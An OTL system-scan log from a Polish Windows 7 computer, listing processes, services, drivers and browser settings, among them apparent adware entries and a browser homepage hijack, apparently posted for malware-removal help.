OTL logfile created on: 2015-01-07 14:48:15 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\BHP\Downloads
 Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd
 
2,86 Gb Total Physical Memory | 1,05 Gb Available Physical Memory | 36,89% Memory free
5,71 Gb Paging File | 3,39 Gb Available in Paging File | 59,31% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 232,88 Gb Total Space | 140,81 Gb Free Space | 60,46% Space Free | Partition Type: NTFS
 
Computer Name: BHP-KOMPUTER | User Name: BHP | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
[color=#E56717]========== Processes (SafeList) ==========[/color]
 
PRC - File not found -- 
PRC - [2015-01-07 14:09:16 | 000,529,136 | ---- | M] () -- C:\Program Files\Cyti Web\updateCytiWeb.exe
PRC - [2015-01-07 14:04:33 | 000,529,136 | ---- | M] () -- C:\Program Files\Cyti Web\bin\utilCytiWeb.exe
PRC - [2015-01-07 04:49:56 | 000,098,544 | ---- | M] () -- C:\Program Files\Cyti Web\bin\CytiWeb.BrowserAdapter.exe
PRC - [2015-01-06 22:14:50 | 000,770,944 | ---- | M] (Enigma Software Group USA, LLC.) -- C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
PRC - [2015-01-06 22:09:06 | 001,328,096 | ---- | M] (iWebar) -- C:\Program Files\Ge-Force\4a263a02-ae51-4b9a-a531-2037e520e833-6.exe
PRC - [2015-01-06 19:50:44 | 000,296,176 | ---- | M] () -- C:\Program Files\Cyti Web\bin\CytiWeb.PurBrowse.exe
PRC - [2014-12-19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014-12-10 20:44:36 | 000,337,520 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2014-12-09 19:08:19 | 001,880,752 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_15_0_0_246.exe
PRC - [2014-12-02 20:12:56 | 000,411,920 | ---- | M] (LogMeIn, Inc.) -- C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe
PRC - [2014-11-18 21:23:36 | 001,519,808 | ---- | M] (Valve Corporation) -- C:\Program Files\Steam\bin\steamwebhelper.exe
PRC - [2014-11-18 21:23:34 | 001,940,160 | ---- | M] (Valve Corporation) -- C:\Program Files\Steam\Steam.exe
PRC - [2014-11-18 21:23:34 | 000,833,728 | ---- | M] (Valve Corporation) -- C:\Program Files\Common Files\Steam\SteamService.exe
PRC - [2014-08-08 17:57:21 | 003,890,208 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\avastui.exe
PRC - [2014-07-14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2014-07-14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2014-07-01 08:25:08 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe
PRC - [2014-06-12 18:05:53 | 000,151,552 | ---- | M] () -- C:\Windows\KMService.exe
PRC - [2014-06-12 18:05:53 | 000,008,192 | ---- | M] () -- C:\Windows\System32\srvany.exe
PRC - [2014-06-12 17:58:31 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2013-12-13 03:47:56 | 000,085,600 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files\Winamp\winampa.exe
PRC - [2013-09-04 18:21:42 | 002,112,000 | ---- | M] () -- C:\Program Files\screenSHU\screenSHU.exe
PRC - [2013-08-02 01:52:57 | 000,271,360 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\conhost.exe
PRC - [2012-11-06 06:42:55 | 000,085,088 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Internet Manager.exe
PRC - [2011-03-14 16:27:28 | 000,271,712 | ---- | M] () -- C:\ProgramData\DataCardService\HWDeviceService.exe
PRC - [2011-02-25 06:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2010-11-20 13:16:54 | 000,100,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\audiodg.exe
PRC - [2010-09-23 15:53:16 | 001,601,536 | ---- | M] () -- C:\Program Files\ASUS\Wireless Console 3\wcourier.exe
PRC - [2009-07-31 08:13:50 | 003,744,616 | ---- | M] (CANON INC.) -- C:\Program Files\Canon\DIAS\CnxDIAS.exe
PRC - [2009-07-14 02:14:24 | 000,157,184 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Windows Defender\MpCmdRun.exe
 
 
[color=#E56717]========== Modules (No Company Name) ==========[/color]
 
MOD - [2015-01-07 04:49:56 | 000,098,544 | ---- | M] () -- C:\Program Files\Cyti Web\bin\CytiWeb.BrowserAdapter.exe
MOD - [2014-12-10 20:44:32 | 003,758,192 | ---- | M] () -- C:\Program Files\Mozilla Firefox\mozjs.dll
MOD - [2014-12-09 19:08:19 | 016,841,392 | ---- | M] () -- C:\Windows\System32\Macromed\Flash\NPSWF32_15_0_0_246.dll
MOD - [2014-11-18 21:23:50 | 002,227,904 | ---- | M] () -- C:\Program Files\Steam\video.dll
MOD - [2014-11-18 21:23:34 | 000,690,880 | ---- | M] () -- C:\Program Files\Steam\bin\chromehtml.dll
MOD - [2014-11-11 19:48:12 | 001,171,456 | ---- | M] () -- C:\Program Files\Steam\libavcodec-56.dll
MOD - [2014-11-11 19:48:12 | 000,485,888 | ---- | M] () -- C:\Program Files\Steam\libswscale-3.dll
MOD - [2014-11-11 19:48:12 | 000,442,368 | ---- | M] () -- C:\Program Files\Steam\libavutil-54.dll
MOD - [2014-11-11 19:48:12 | 000,403,968 | ---- | M] () -- C:\Program Files\Steam\libavformat-56.dll
MOD - [2014-11-11 19:48:12 | 000,332,800 | ---- | M] () -- C:\Program Files\Steam\libavresample-2.dll
MOD - [2014-11-11 19:48:04 | 034,589,888 | ---- | M] () -- C:\Program Files\Steam\bin\libcef.dll
MOD - [2014-11-11 19:47:56 | 000,774,656 | ---- | M] () -- C:\Program Files\Steam\SDL2.dll
MOD - [2014-09-06 17:44:46 | 000,035,328 | ---- | M] () -- C:\Program Files\FileZilla FTP Client\fzshellext.dll
MOD - [2014-06-12 17:58:31 | 019,336,120 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\libcef.dll
MOD - [2014-05-24 17:41:24 | 000,892,416 | ---- | M] () -- C:\Program Files\FileZilla FTP Client\libstdc++-6.dll
MOD - [2014-05-24 17:41:24 | 000,091,648 | ---- | M] () -- C:\Program Files\FileZilla FTP Client\libgcc_s_sjlj-1.dll
MOD - [2013-09-04 23:14:10 | 004,300,456 | ---- | M] () -- C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2013-09-04 18:21:42 | 002,112,000 | ---- | M] () -- C:\Program Files\screenSHU\screenSHU.exe
MOD - [2012-11-06 06:42:55 | 000,085,088 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Internet Manager.exe
MOD - [2012-11-06 05:31:00 | 000,148,992 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\VPNPlugin.dll
MOD - [2012-11-06 05:30:42 | 000,110,080 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\ServiceUIPlugin.dll
MOD - [2012-11-06 05:30:10 | 000,139,776 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\HelpUIPlugin.dll
MOD - [2012-11-06 05:29:07 | 000,423,424 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\USSDUIPlugin.dll
MOD - [2012-11-06 05:24:22 | 000,303,104 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\SettingUIPlugin.dll
MOD - [2012-11-06 05:14:06 | 000,142,336 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\USSDSrvPlugin.dll
MOD - [2012-09-25 02:05:39 | 000,820,104 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\MiniFramePlugin.dll
MOD - [2012-09-24 12:51:37 | 000,309,128 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\XFramePlugin.dll
MOD - [2012-09-24 12:51:35 | 000,174,984 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\XCodec.dll
MOD - [2012-09-24 12:51:30 | 000,141,704 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Trace.dll
MOD - [2012-09-24 12:51:29 | 000,325,000 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\StatusBarMgrPlugin.dll
MOD - [2012-09-24 12:51:27 | 000,845,704 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\SMSUIPlugin.dll
MOD - [2012-09-24 12:51:25 | 000,225,160 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\SmsSrvPlugin.dll
MOD - [2012-09-24 12:51:23 | 000,692,104 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\SmsAppPlugin.dll
MOD - [2012-09-24 12:51:18 | 000,281,992 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\sdk.dll
MOD - [2012-09-24 12:51:16 | 000,396,168 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Proxy.dll
MOD - [2012-09-24 12:51:14 | 000,551,304 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\PluginContainer.dll
MOD - [2012-09-24 12:51:13 | 000,071,560 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\OSPowerMgr.dll
MOD - [2012-09-24 12:51:11 | 000,137,608 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\OSNDIS.dll
MOD - [2012-09-24 12:51:09 | 000,139,656 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\OSDialup.dll
MOD - [2012-09-24 12:51:06 | 000,107,912 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\OSAdapt.dll
MOD - [2012-09-24 12:51:04 | 000,103,304 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NotifyServicePlugin.dll
MOD - [2012-09-24 12:51:02 | 000,242,568 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetSrvPlugin.dll
MOD - [2012-09-24 12:51:01 | 000,506,760 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetSettingPlugin.dll
MOD - [2012-09-24 12:50:59 | 000,523,656 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetInfoUIExPlugin.dll
MOD - [2012-09-24 12:50:57 | 000,301,960 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetInfoSrvPlugin.dll
MOD - [2012-09-24 12:50:55 | 000,314,760 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetInfoRecordUIPlugin.dll
MOD - [2012-09-24 12:50:54 | 000,164,744 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetConnectSrvPlugin.dll
MOD - [2012-09-24 12:50:52 | 000,336,264 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetConnectPlugin.dll
MOD - [2012-09-24 12:50:50 | 000,185,224 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NDISPlugin.dll
MOD - [2012-09-24 12:50:47 | 000,277,384 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\MenuMgrPlugin.dll
MOD - [2012-09-24 12:50:45 | 000,123,272 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\LayoutPlugin.dll
MOD - [2012-09-24 12:50:41 | 000,424,840 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DialupUIPlugin.dll
MOD - [2012-09-24 12:50:40 | 000,217,992 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DialUpPlugin.dll
MOD - [2012-09-24 12:50:38 | 000,418,184 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DiagnosisPlugin.dll
MOD - [2012-09-24 12:50:36 | 000,306,568 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DeviceSrvPlugin.dll
MOD - [2012-09-24 12:50:34 | 000,565,640 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DeviceMgrUIPlugin.dll
MOD - [2012-09-24 12:50:32 | 000,343,432 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DeviceAppPlugin.dll
MOD - [2012-09-24 12:50:26 | 000,163,208 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DataServicePlugin.dll
MOD - [2012-09-24 12:50:23 | 000,432,008 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\core.dll
MOD - [2012-09-24 12:50:21 | 000,106,376 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\CompressRatePlugin.dll
MOD - [2012-09-24 12:50:19 | 000,228,232 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Common.dll
MOD - [2012-09-24 12:50:18 | 000,129,928 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\ATR2SMgr.dll
MOD - [2012-09-24 12:50:16 | 000,245,128 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\AtCodec.dll
MOD - [2012-09-24 12:50:14 | 000,811,912 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\AddrBookUIPlugin.dll
MOD - [2012-09-24 12:50:08 | 000,268,680 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\AddrBookSrvPlugin.dll
MOD - [2012-09-24 12:50:06 | 001,093,000 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\AddrBookPlugin.dll
MOD - [2012-05-18 01:40:24 | 000,120,192 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Win7Support.dll
MOD - [2012-05-18 01:39:11 | 001,107,328 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NDISAPI.dll
MOD - [2012-05-18 01:38:59 | 000,250,752 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\LiveUpdateInterface.dll
MOD - [2012-01-10 20:12:12 | 000,094,208 | ---- | M] () -- C:\Windows\System32\IccLibDll.dll
MOD - [2011-06-08 08:32:26 | 000,011,362 | ---- | M] () -- C:\Program Files\screenSHU\mingwm10.dll
MOD - [2011-06-08 08:32:24 | 000,043,008 | ---- | M] () -- C:\Program Files\screenSHU\libgcc_s_dw2-1.dll
MOD - [2010-09-23 15:53:16 | 001,601,536 | ---- | M] () -- C:\Program Files\ASUS\Wireless Console 3\wcourier.exe
MOD - [2010-06-04 10:31:46 | 000,082,944 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\plugins\imageformats\qgif4.dll
MOD - [2010-06-04 10:31:46 | 000,081,920 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\plugins\imageformats\qico4.dll
MOD - [2010-05-05 09:47:36 | 002,415,104 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\QtCore4.dll
MOD - [2010-02-10 15:43:38 | 009,515,520 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\QtGui4.dll
MOD - [2010-02-10 15:10:26 | 001,148,416 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\QtNetwork4.dll
MOD - [2010-02-10 15:06:52 | 000,398,336 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\QtXml4.dll
MOD - [2009-06-22 19:42:42 | 000,043,008 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\libgcc_s_dw2-1.dll
MOD - [2009-01-10 11:32:40 | 000,011,362 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\mingwm10.dll
 
 
[color=#E56717]========== Services (SafeList) ==========[/color]
 
SRV - File not found [On_Demand | Stopped] -- C:\Program Files\Google\Update\GoogleUpdate.exe /medsvc -- (gupdatem)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Google\Update\GoogleUpdate.exe /svc -- (gupdate)
SRV - [2015-01-07 14:09:16 | 000,529,136 | ---- | M] () [Auto | Running] -- C:\Program Files\Cyti Web\updateCytiWeb.exe -- (Update Cyti Web)
SRV - [2015-01-07 14:04:33 | 000,529,136 | ---- | M] () [Auto | Running] -- C:\Program Files\Cyti Web\bin\utilCytiWeb.exe -- (Util Cyti Web)
SRV - [2015-01-06 22:14:50 | 000,770,944 | ---- | M] (Enigma Software Group USA, LLC.) [Auto | Running] -- C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe -- (SpyHunter 4 Service)
SRV - [2015-01-06 22:08:46 | 000,068,608 | ---- | M] (globalUpdate) [On_Demand | Stopped] -- C:\Program Files\globalUpdate\Update\GoogleUpdate.exe -- (globalUpdatem)
SRV - [2015-01-06 22:08:46 | 000,068,608 | ---- | M] (globalUpdate) [Auto | Stopped] -- C:\Program Files\globalUpdate\Update\GoogleUpdate.exe -- (globalUpdate)
SRV - [2014-12-19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014-12-13 17:01:08 | 001,895,760 | ---- | M] (LogMeIn Inc.) [Auto | Stopped] -- C:\Program Files\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2014-12-09 19:09:02 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014-12-02 20:12:56 | 000,411,920 | ---- | M] (LogMeIn, Inc.) [Auto | Running] -- C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe -- (LMIGuardianSvc)
SRV - [2014-11-22 02:55:14 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV - [2014-11-18 21:23:34 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Running] -- C:\Program Files\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014-11-05 14:03:45 | 000,174,112 | ---- | M] (EasyAntiCheat Ltd) [On_Demand | Stopped] -- C:\Windows\System32\EasyAntiCheat.exe -- (EasyAntiCheat)
SRV - [2014-07-24 15:14:44 | 001,343,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\Wat\WatAdminSvc.exe -- (WatAdminSvc)
SRV - [2014-07-14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014-07-14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014-06-12 18:05:53 | 000,008,192 | ---- | M] () [Auto | Running] -- C:\Windows\System32\srvany.exe -- (KMService)
SRV - [2014-06-12 17:58:31 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV - [2014-05-15 15:14:00 | 003,191,392 | ---- | M] (INCA Internet Co., Ltd.) [On_Demand | Stopped] -- C:\Windows\System32\GameMon.des -- (npggsvc)
SRV - [2014-05-01 08:49:58 | 000,022,016 | ---- | M] (Apache Software Foundation) [On_Demand | Stopped] -- c:\wamp\bin\apache\apache2.4.9\bin\httpd.exe -- (wampapache)
SRV - [2014-05-01 08:06:12 | 010,959,360 | ---- | M] () [On_Demand | Stopped] -- c:\wamp\bin\mysql\mysql5.6.17\bin\mysqld.exe -- (wampmysqld)
SRV - [2014-04-03 19:21:48 | 000,315,008 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013-12-18 23:41:02 | 030,814,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2013-10-05 01:38:22 | 000,071,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe -- (VsEtwService120)
SRV - [2013-05-27 05:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2011-06-17 12:04:16 | 000,224,096 | ---- | M] () [Auto | Stopped] -- C:\Program Files\T-Mobile\InternetManager_H\UpdateDog\ouc.exe -- (Internet Manager. RunOuc)
SRV - [2011-03-14 16:27:28 | 000,271,712 | ---- | M] () [Auto | Running] -- C:\ProgramData\DataCardService\HWDeviceService.exe -- (HWDeviceService.exe)
SRV - [2009-07-31 08:13:50 | 003,744,616 | ---- | M] (CANON INC.) [Auto | Running] -- C:\Program Files\Canon\DIAS\CnxDIAS.exe -- (Canon Driver Information Assist Service)
SRV - [2009-07-14 02:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)
 
 
[color=#E56717]========== Driver Services (SafeList) ==========[/color]
 
DRV - File not found [Kernel | Disabled | Running] -- C:\Program Files\ShopperPro\JSDriver\1463.0.0.0\jsdrv.sys -- (SPDRIVER_1463.0.0.0)
DRV - File not found [Kernel | On_Demand | Stopped] -- C:\Windows\system32\drivers\EagleXNt.sys -- (EagleXNt)
DRV - [2015-01-06 22:14:56 | 000,019,984 | ---- | M] () [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\EsgScanner.sys -- (EsgScanner)
DRV - [2015-01-06 06:43:12 | 000,043,152 | ---- | M] (StdLib) [Kernel | System | Running] -- C:\Windows\System32\drivers\{f69f75dd-7e74-4885-b8d1-87b7e0b79ccb}Gw.sys -- ({f69f75dd-7e74-4885-b8d1-87b7e0b79ccb}Gw)
DRV - [2014-08-29 09:12:36 | 000,050,728 | ---- | M] (Eugene V. Muzychenko) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\vrtaucbl.sys -- (EuMusDesignVirtualAudioCableWdm)
DRV - [2014-06-12 17:58:56 | 000,777,488 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswsnx.sys -- (aswSnx)
DRV - [2014-06-12 17:58:56 | 000,411,680 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswsp.sys -- (aswSP)
DRV - [2014-06-12 17:58:56 | 000,068,312 | ---- | M] (AVAST Software) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\aswstm.sys -- (aswStm)
DRV - [2014-06-12 17:58:33 | 000,180,632 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswVmm.sys -- (aswVmm)
DRV - [2014-06-12 17:58:33 | 000,081,768 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr)
DRV - [2014-06-12 17:58:33 | 000,067,824 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV - [2014-06-12 17:58:33 | 000,049,944 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswRvrt.sys -- (aswRvrt)
DRV - [2014-06-12 17:58:33 | 000,024,184 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\System32\drivers\aswHwid.sys -- (aswHwid)
DRV - [2014-06-12 17:58:30 | 000,026,136 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswKbd.sys -- (aswKbd)
DRV - [2012-09-18 09:20:45 | 000,203,264 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_juwwanecm.sys -- (huawei_wwanecm)
DRV - [2012-08-20 01:54:19 | 000,027,520 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_juextctrl.sys -- (huawei_ext_ctrl)
DRV - [2012-08-20 01:54:18 | 000,096,000 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_jucdcacm.sys -- (huawei_cdcacm)
DRV - [2012-08-20 01:54:18 | 000,076,544 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ew_jubusenum.sys -- (huawei_enumerator)
DRV - [2011-06-27 00:37:12 | 002,191,872 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\athr.sys -- (athr)
DRV - [2010-11-20 11:24:41 | 000,052,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV - [2010-07-27 02:52:02 | 000,102,784 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_hwusbdev.sys -- (ew_hwusbdev)
DRV - [2010-03-20 05:06:58 | 000,011,136 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_usbenumfilter.sys -- (ew_usbenumfilter)
DRV - [2009-09-17 18:54:14 | 000,041,088 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\HECI.sys -- (HECI)
DRV - [2009-07-14 00:52:10 | 000,014,336 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vwifimp.sys -- (vwifimp)
DRV - [2009-03-18 17:35:40 | 000,026,176 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\hamachi.sys -- (hamachi)
DRV - [2007-07-31 01:39:00 | 000,007,680 | ---- | M] (ATK0100) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ATKACPI.sys -- (MTsensor)
DRV - [2006-05-03 21:40:42 | 000,390,784 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\snpstd.sys -- (snpstd)
 
 
[color=#E56717]========== Standard Registry (SafeList) ==========[/color]
 
 
[color=#E56717]========== Internet Explorer ==========[/color]
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?type=ds&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889&q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?type=ds&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889&q={searchTerms}
IE - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://istart.webssearches.com/web/?type=ds&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889&q={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKCU\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://istart.webssearches.com/web/?type=ds&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889&q={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>
 
[color=#E56717]========== FireFox ==========[/color]
 
FF - prefs.js..browser.search.isUS: false
FF - prefs.js..browser.search.useDBForOrder: "false"
FF - prefs.js..browser.startup.homepage: "http://www.onet.pl/"
